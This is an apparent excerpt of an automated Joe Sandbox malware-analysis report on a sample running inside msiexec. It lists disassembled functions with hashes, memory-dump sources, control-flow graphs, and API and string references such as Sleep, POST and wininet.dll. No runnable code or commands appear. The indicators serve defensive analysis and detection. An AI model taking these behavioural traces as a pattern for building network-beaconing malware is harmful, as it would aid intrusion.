                                            • Opcode Fuzzy Hash: 8f6ea6a8a2554fb007b883771a1f806a68aef3fd6296c34c4759e4a38832eab9
                                            • Instruction Fuzzy Hash: E290023530140C42F11071584404B5600058BE0305F56C026A0125678D8755D9517522
                                            Function 04732CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4157cb9e29189808e1f7752ae2ae40dc6ba8dc42acc35fc0c390b4de7233028e
                                            • Instruction ID: 134a069e602e574c31d0ec866bf491ea8bebfe1961c64488114ab6cd5916fd3c
                                            • Opcode Fuzzy Hash: 4157cb9e29189808e1f7752ae2ae40dc6ba8dc42acc35fc0c390b4de7233028e
                                            • Instruction Fuzzy Hash: F490023530140802F1107598540865600058BE0305F56D021A5025579EC7A5D9916132
                                            Function 04732D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 70e45e8c4f3850fbf4d41c69d25c13c07b43f171665f2bbd966539627a576ce1
                                            • Instruction ID: 3434a13062d1861ae666e4320b96d581860cd78af9906dcec46e6dc4838c0e0f
                                            • Opcode Fuzzy Hash: 70e45e8c4f3850fbf4d41c69d25c13c07b43f171665f2bbd966539627a576ce1
                                            • Instruction Fuzzy Hash: F090022D31340402F1907158540861A00058BD1206F96D425A001657CCCB55D9695322
                                            Function 04732DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7ec41005c701b7bec2f05ac06ac034074bcf9f977b376746d2e85de5916a0e95
                                            • Instruction ID: 2f586c3617ea89058654878b1119ab385c223dbd8dc22dd43fb1197e01738167
                                            • Opcode Fuzzy Hash: 7ec41005c701b7bec2f05ac06ac034074bcf9f977b376746d2e85de5916a0e95
                                            • Instruction Fuzzy Hash: 5790023530140813F1217158450471700098BD0245F96C422A042557CD9796DA52A122
                                            Function 04732DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1f7dbf642f9ac16f72e100bd85e64054d042d5c1475d02d901ae95cbdcb07d6d
                                            • Instruction ID: ded2bb2d77c25e370020a46bc2a1d18aad7581d2742db88ee2da3ba280451619
                                            • Opcode Fuzzy Hash: 1f7dbf642f9ac16f72e100bd85e64054d042d5c1475d02d901ae95cbdcb07d6d
                                            • Instruction Fuzzy Hash: AA900225342445527555B158440451740069BE0245796C022A1415974C8766E956D622
                                            Function 04732EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3081db9972538dad7ad3f09a866809e61385acba97c8fbfa9ff88afaac7526e0
                                            • Instruction ID: 6737ca1e460a65dca3762b76e4627a3b353a6f57566954e614e07869034f843c
                                            • Opcode Fuzzy Hash: 3081db9972538dad7ad3f09a866809e61385acba97c8fbfa9ff88afaac7526e0
                                            • Instruction Fuzzy Hash: B390027530140802F1507158440475600058BD0305F56C021A5065578E8799DED56666
                                            Function 04732F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e77ab1dfcd41cf7f496c32cba3ec22220bf1e47171c668c0254533c83fa6b198
                                            • Instruction ID: a3712585190571ff9cf05c3fbfa0181be32abf4c0119bead7fcd1c913778007f
                                            • Opcode Fuzzy Hash: e77ab1dfcd41cf7f496c32cba3ec22220bf1e47171c668c0254533c83fa6b198
                                            • Instruction Fuzzy Hash: 0090026534140842F11071584414B160005CBE1305F56C025E1065578D8759DD526127
                                            Function 04732FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0bcf9543ce687f94bc8b6a832f6474a2a186c63b4bda0a7edaf71d665552e865
                                            • Instruction ID: 2a6f3febae0bdb18a446955cb2c6a62017a30670d8d2b8db856f1ac334052dc5
                                            • Opcode Fuzzy Hash: 0bcf9543ce687f94bc8b6a832f6474a2a186c63b4bda0a7edaf71d665552e865
                                            • Instruction Fuzzy Hash: AE900225311C0442F21075684C14B1700058BD0307F56C125A0155578CCB55D9615522
                                            Function 04732AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3c747a13bd06a28650880e2a8fa69a0f7023e90d671425c42071f04f5fee5c6c
                                            • Instruction ID: 7cc1567548e8d88daf13198b3f8a5a7212f550fdb7899e889a52de6c8b4b953f
                                            • Opcode Fuzzy Hash: 3c747a13bd06a28650880e2a8fa69a0f7023e90d671425c42071f04f5fee5c6c
                                            • Instruction Fuzzy Hash: F6900229311404032115B558070451700468BD5355356C031F1016574CD761D9615122
                                            Function 04732B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b3e89355bd9df478fb6e4f9f6902019c3528a06563442d5389fa97480d39b1ce
                                            • Instruction ID: 863a9d2a3cb52a153fc034a7bdcad5d7e6f385662e30c4c50177e03d3a63a305
                                            • Opcode Fuzzy Hash: b3e89355bd9df478fb6e4f9f6902019c3528a06563442d5389fa97480d39b1ce
                                            • Instruction Fuzzy Hash: FE90026530240403611571584414626400A8BE0205B56C031E10155B4DC765D9916126
                                            Function 047335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9e62cbb3b62b6cb6afd4eef75bf60e41450a719590a269a47a47c81c0a8a572d
                                            • Instruction ID: a71a2dfe3d2aa770acafb69d5f83bcb1611b095b81026f4abb1867d062f39a08
                                            • Opcode Fuzzy Hash: 9e62cbb3b62b6cb6afd4eef75bf60e41450a719590a269a47a47c81c0a8a572d
                                            • Instruction Fuzzy Hash: 4E90023570550802F1107158451471610058BD0205F66C421A042557CD87D5DA5165A3
                                            Function 005E9076 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 118sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 402 5e9076-5e907c 403 5e907e-5e90c2 call 5ebd40 402->403 404 5e901d-5e9029 402->404 412 5e919c-5e91a2 403->412 413 5e90c8-5e9118 call 5ebe10 call 5dacf0 call 5e4e50 403->413 406 5e902f-5e9049 call 5eaaf0 404->406 407 5e902a call 5ec0b0 404->407 414 5e905b-5e9075 call 5eabd0 * 2 406->414 415 5e904b-5e904f 406->415 407->406 429 5e9120-5e9131 Sleep 413->429 415->414 418 5e9051 415->418 418->414 430 5e9196-5e919a 429->430 431 5e9133-5e9139 429->431 430->412 430->429 432 5e913b-5e9161 call 5e8ca0 431->432 433 5e9163-5e9183 431->433 435 5e9189-5e918c 432->435 433->435 436 5e9184 call 5e8eb0 433->436 435->430 436->435
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 005E9128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_5d0000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: POST$net.dll$wininet.dll
                                            • API String ID: 3472027048-3140911592
                                            • Opcode ID: 3e3c01edf46ad5deabee34f1fe315b682a910d7b8926f11e58dc20b32d25ebf1
                                            • Instruction ID: 57066507ab3449b17b8ac70087d9f90dbbf382731223c307a1551814656f729d
                                            • Opcode Fuzzy Hash: 3e3c01edf46ad5deabee34f1fe315b682a910d7b8926f11e58dc20b32d25ebf1
                                            • Instruction Fuzzy Hash: 504105B1900246BBD728DF65CC89FABBBB8FB84704F008119F95D5B241D734BA50CBA5
                                            Function 005E9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 438 5e9080-5e90c2 call 5ebd40 441 5e919c-5e91a2 438->441 442 5e90c8-5e9118 call 5ebe10 call 5dacf0 call 5e4e50 438->442 449 5e9120-5e9131 Sleep 442->449 450 5e9196-5e919a 449->450 451 5e9133-5e9139 449->451 450->441 450->449 452 5e913b-5e9161 call 5e8ca0 451->452 453 5e9163-5e9183 451->453 455 5e9189-5e918c 452->455 453->455 456 5e9184 call 5e8eb0 453->456 455->450 456->455
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 005E9128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_5d0000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 25d21b78aca220dfb326c4a1fa34404d4f341e476188e7c6674460533353cf02
                                            • Instruction ID: 0e009e2acf12e2c0c57a37957fb2e45e304a4d9d5edccb4a1292710c24caf109
                                            • Opcode Fuzzy Hash: 25d21b78aca220dfb326c4a1fa34404d4f341e476188e7c6674460533353cf02
                                            • Instruction Fuzzy Hash: C73194B2500386BBC728DF65C889F67BBB8FB88B00F10851DF66E5B245D630B550CBA4
                                            Function 04732C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046C0000, based on PE: true
                                            • Associated: 00000007.00000002.4571896686.00000000047E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.00000000047ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_46c0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8a110654fbe8b362db38ddec46bab311ac20a9c544a3f07a70270bf615257712
                                            • Instruction ID: a99fd69d6b6157440f39ce762f50e8c8cb83ca3ac181764f4048e59966359a83
                                            • Opcode Fuzzy Hash: 8a110654fbe8b362db38ddec46bab311ac20a9c544a3f07a70270bf615257712
                                            • Instruction Fuzzy Hash: E3B09B75A015C5C5FB11F760460871779006BD0705F16C071D2030665F4778E1D5E176